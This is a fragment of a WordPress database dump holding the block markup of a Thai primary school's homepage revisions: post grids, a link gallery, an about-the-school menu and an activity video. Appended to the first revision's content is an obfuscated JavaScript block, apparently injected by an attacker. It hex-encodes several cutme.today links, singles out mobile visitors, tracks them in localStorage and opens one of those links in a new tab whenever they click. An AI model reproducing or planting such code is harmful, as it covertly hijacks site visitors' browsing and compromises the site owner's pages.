{\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 12:13:20','2024-07-27 05:13:20','',14,'http://pakhaeng.ssk.in.th/?p=139',0,'revision','',0),
(140,1,'2024-07-27 12:13:37','2024-07-27 05:13:37','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/headline {\"uniqueId\":\"0ec6139a\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"22px\"}} -->\n<h2 class=\"gb-headline gb-headline-0ec6139a gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:video {\"id\":138} -->\n<figure class=\"wp-block-video\"><video controls src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุนทนภู่.mp4\"></video></figure>\n<!-- /wp:video -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph 